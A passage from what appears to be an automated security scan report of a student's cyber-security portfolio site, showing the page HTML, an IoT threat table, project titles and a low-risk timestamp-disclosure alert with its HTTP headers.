          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          083845791
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        16. GET https://beekmans.dev/
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          166584919, which evaluates to: 1975-04-13 02:35:19

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
